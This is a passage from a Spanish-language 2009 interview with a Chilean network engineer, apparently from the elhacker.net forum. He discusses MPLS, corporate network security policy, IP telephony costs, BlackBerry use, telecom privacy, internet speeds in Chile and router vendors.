Es por esto que una solución a simple vista fácil, como es, solo la lectura y conmutación a través de una etiqueta añadida al paquete como lo es MPLS, es que hace hoy en día tener una Internet más eficiente y poder tener por ej. Video Conferencias o tunelización de VPN de un lado del Mundo al otro ... es de forma casi instantánea.
\\\WHK/// dice:
Yo como administrador de mi modesto servidor empresarial ¿que puedo hacer para prevenir un ataque a nivel red y que debo hacer para cuidarme en el futuro?
.:: NaNo N RoSeS ::. dice:
Yo como administrador y por le experiencia que tengo en el área, creo que lo mejor es educar, a que me refiero con esto. He visto en muchas empresas por no decir la gran mayoría que me dicen… - Necesito que bloquees el MSN, que bloquees el Kazaa Ares, Faceebook, Fotolog etc etc etc.- Si bien se hace... siempre hay una sola persona (aunque sea una) que trata de eludir las restricciones, ya sea por un proxy, Web Proxy, clonando la MAC de otro user que si tiene privilegios, utilizando algún Diccionario para reventar la pass del admin, usar Live Cd etc.
A mi modo de ver y de pensar creo que si bien es importante bloquear algunas cosas básicas como por ej. Ares, Kazaa que son herramientas que no son Corporativa, es educar y "rayar la cancha" al empleado sobre estos temas, yo si fuera Dueño de una empresa me da lo mismo si Juanito Pérez pasa todo el día hablando por MSN si es que me cumple a cabalidad con los objetivos impuestos, entonces indicarle a un Ejecutivo que lea o no el diario, o que no hable por MSN o que lisa y llanamente le bloqueo todo el internet es para mí algo poco conducente. Alguna medida que tomaría seria por ej. Anexar alguna clausula sobre si hay alguna actividad sospechosa que tenga que ver con la integridad de la Red su termino de contrato es inmediato y la renuncia de primas ganadas hasta la actualidad, si no me equivoco dicen que cerca del 60% de los incidentes informáticos surgen dentro de la Red, es decir, por los trabajadores.
Con respecto a Internet lo único que puedo decir es leer bien los manuales, ya que siempre se confían que solo es siguiente siguiente y siguiente y en los mismo manuales muchas veces viene los Tips de seguridad, esta demás decir que tener un buen antivirus, Firewall, segmentar las redes, autenticar protocolos, sacar las VPN de la DMZ etc.
\\\WHK/// dice:
¿Realmente la telefonía IP sale más económico que usar la línea fija?
.:: NaNo N RoSeS ::. dice:
La telefonía IP es buena, bonita y barata en ciertos aspectos. Buena porque se pueden integrar mucho mas servicios que solo recibir y efectuar una llamada, hoy en día vemos servicios como por ej. La Presencia o se puede añadir un servicio de VoiceMail. Bonita porque está de acuerdo a la tecnología que hoy en día vivimos, la paquetizacion o digitalización de datos y barata en escala corporativa grandes, es decir, suele ser rentable en compañía multinacional o de gran escala como se quiera llamar. Con esto no quiero decir que el Telefonía IP es muuucho más barato que la telefonia convencional, de hecho los teléfonos IP son costosos, tener servidores, PBX también lo son, pero si vemos en términos de eficiencia y/o eficacia es técnicamente económico. Un ej. Es que si tú me llamas a mi Teléfono de Of.
Este puede ser capaz de buscarme dentro de la cía. o fuera del País si se le enseña cómo hacerlo, me puede enviar un correo indicándome que me has llamado o que me has enviado por ej. "Los Gastos financieros del Mes" siendo que estoy al otro lado del mundo y tú no lo sabes. Esto en términos económicos es mucho mas eficiente, presta continuidad a las labores que se realicen en la empresa y por consiguiente un trabajo más eficiente.
\\\WHK/// dice:
Sé que trabajas también dando soporte a clientes con BlackBerrys, ¿también tienes uno o usas un ladrillo como todo ser mortal? jajaja
.:: NaNo N RoSeS ::. dice:
Efectivamente, trabajo en una Cía. de Telecomunicaciones en donde mi s funciones como Ingeniero en Redes es velar por la continuidad de los servicios y uno de ellos es los BlackBerry. Aun que te parezca curioso pero hay un dicho que lo contesta, que dice, "En casa de herrero, cuchillo de palo" y en mi caso no poseo un BlackBerry. Sin embargo considero una fantástica herramienta de trabajo, presta continuidad en los servicio que una persona pueda entregar a la empresa, se acopla perfectamente a tecnologías usadas y que son masivamente ocupadas como son Office o PDF, esta demás decir, que funciona bajo plataformas de Correo de M. Exchange, Lotus y GroupWise.
Bueno, contestando a tu pregunta, básicamente no uso BlackBerry porque no tengo tiempo para nada, trabajo de Lunes a Lunes y sumado a esto es que si poseo un BB me deja tremendamente ligado de mi trabajo, quedando prisionero de esto y es por esa Razón que no la Uso, imagínate que me envíes un correo y éste lo tengo asociado a mi BlackBerry, entonces tu al enviármelo sea como sea das por sabido que el correo me llegó y que, por ende, ya tengo conocimiento de ello y eso no me gusta, como te dije trabajo todo el día y además estar contestando correos a través de mi BlackBerry los días de descanso u horas de descanso que tenga no lo encuentro producente.
\\\WHK/// dice:
¿Tu crees que las compañías de telefonía les importe la seguridad en sus sistemas o la privacidad de los datos personales de sus clientes? danos una cifra entre uno y diez.
.:: NaNo N RoSeS ::. dice:
No solo creo que en la Cía. de Telecomunicaciones pasa esto, sino que en la gran mayoría. Si vemos que la principal actividad o razón de ser de una Empresa es básicamente... La Maximización de sus utilidades, ahora ¿como se obtiene esto? eso da lo mismo sino la cosa es Obtenerlo y al corto plazo, es por esta razón que es lógica, que se dejan tareas de lado como por ej. La calidad de vida de trabajo que llevan su empleados como también materias importantes como los son la confiabilidad de los datos que maneja la empresa con respecto a sus clientes, esto también va de la mano del sector de la Empresa que se esté haciendo esta pregunta, sería distinto contesta esta pregunta en el contexto Bancario, ya que obviamente aquí los datos son críticos.
Hace 1 año me toco realizar una proyección que realizo una prestigiosa Universidad Estatal de Chile en la cual veía y analizaba la penetración digital en las empresas, éste trabajo dio como resultado que la principal actividad u objetivo de la Empresa es sus operaciones y satisfacción al cliente y que en puestos más abajo estaba la seguridad informática como también personas competente en el área. En este mismo estudio la gran mayoría de las Empresas dio como resultado que el sistema informático está Administrado bajo un departamento, que a mi juicio no debiese ser así, Informática se encarga de informática, seguridad se encarga de seguridad y audita a los demás depto. y así. Pero al parecer no se le toma el peso que debiese ser en este sentido, será que es por nuestro subdesarrollo. Con respecto a la nota de 1 a 10, le pongo un 5.
\\\WHK/// dice:
Hace tiempo aparecieron unos rumores que las señales telefónicas producen cáncer, ¿será verdad que todos vamos a morir cancerígenos o que tan leve puede ser?
.:: NaNo N RoSeS ::. dice:
Dicen que la exposición prolongada a estas ondas a la larga producen cáncer, en la cual no tengo información certera de que sea así, creo que es un tema mas científico, también he escuchado que los hombres tienen más posibilidades de padecer cáncer testicular ya que el hombre siempre anda con el Móvil en el bolsillo a diferencia de las mujeres que lo llevan en sus bolsos. Como te dije en un principio, creo que es un tema científico y no tengo información sobre esto.
\\\WHK/// dice:
Jajaja menos mal que lo guardo en el bolsillo de mi camisa. ¿Quien crees que tenga la culpa de las bajas velocidades de Internet que nos entregan en Chile a comparación de otros lugares, el proveedor de la línea o el proveedor ISP?
.:: NaNo N RoSeS ::. dice:
La culpa creo yo en que las velocidades de Internet sean bajas son netamente políticas, he sabido por ahí con amigos que tienen altos grados ejecutivos en distintas cias. de telecomunicaciones en donde me señalan o se llega a la conclusión que chile esta prácticamente en su mayor velocidad de entrega en cuanto a ancho de banda hacia el usuario, si queremos más ancho de banda que al fin y al cabo es lo más caro, necesariamente se necesita mayor tecnología en cuanto a cableado, dispositivos y medios físicos de transmisión y eso significa muuucho dinero y es en este punto que creo que es un estancamiento netamente Político, no he visto un plan de parte del gobierno que incentive a cambiar la tecnología o subsidiar a los ISP para que se animen invertir, pero bueno, todos sabemos que cuando juntamos dinero y política el resultado es incierto.
\\\WHK/// dice:
Bueno, y llegamos a la pregunta trivial. ¿Cisco 3com o Juniper?
.:: NaNo N RoSeS ::. dice:
Con respecto a que prefiero, tal como lo dices tú es trivial la respuesta, no es algo que lo desee yo en realidad ya que de desear no me interesa mucho, pero aquí vemos la incidencia o penetración que pueda tener una marca, sobre 3com es súper poco lo que he visto en grandes empresas 3com lo veo solo a nivel de capa2, es decir, Switches. Ahora con respecto a Cisco lo defiendo porque soy certificado en ello y es la tecnología que mas conozco y porque Cisco invierte gran cantidad de dinero en el estudio de redes eficiente y además es que Cisco junto con Juniper están en la gran mayoría de las empresas grandes e ISP, he visto unas cajas impresionantes que son más grandes que un Microonda que cumplen la función de un Router jajaja Por lo que mis preferidos son Cisco, Juniper y 3Com.
\\\WHK/// dice:
Bueno, muchas gracias por tu tiempo, nos vemos en otra ocasión.



Despedida
Al finalizar la entrevista el tomó su maletín y se fue nuevamente a atender los problemas que la gente no puede solucionar dándose a mostrar que nadie sabe hacer mejor su trabajo.

Créditos
Autor: WHK
Entrevistado: NaNoNRoSes (http://foro.elhacker.net/profiles/nanonroses-u1982.html || http://www.new-bytes.net/ )
Lugar de encuentro: MSN y via E-Mail
Fecha: Lunes 06 de Julio del 2009